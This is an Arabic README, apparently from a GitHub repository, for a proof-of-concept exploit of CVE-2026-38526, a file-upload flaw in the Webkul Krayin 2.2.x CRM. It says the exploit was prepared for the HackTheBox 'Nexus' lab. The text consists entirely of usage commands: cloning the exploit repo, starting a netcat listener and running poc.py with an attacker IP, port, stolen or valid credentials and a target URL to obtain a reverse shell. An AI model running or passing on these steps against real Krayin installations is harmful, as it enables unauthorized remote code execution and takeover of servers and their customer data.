
نص برمجي لإثبات المفهوم لـ CVE-2026-38526، تنفيذ أوامر عن بُعد عبر ثغرة رفع ملفات في نقطة النهاية /admin/tinymce/upload لـ webkul krayin 2.2.x
هذا هو سكريبت إثبات المفهوم لـ CVE-2026-38526، وهو تنفيذ أوامر عن بُعد عبر ثغرة رفع ملفات في نقطة النهاية /admin/tinymce/upload الخاصة بـ Webkul Krayin 2.2.x (مُعدّ لـ htb-nexus).
git clone https://github.com/Resolvdd/CVE-2026-38526-PoC-htb-nexus.git
cd CVE-2026-38526-PoC-htb-nexus
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
nc -lvnp <port number> (Default: 9001)
python3 poc.py -i <your-ip> -p <listener-port-number> -e <valid-krayin-email> -P <valid-krayin-password> -u <url-excluding-protocol Default: http>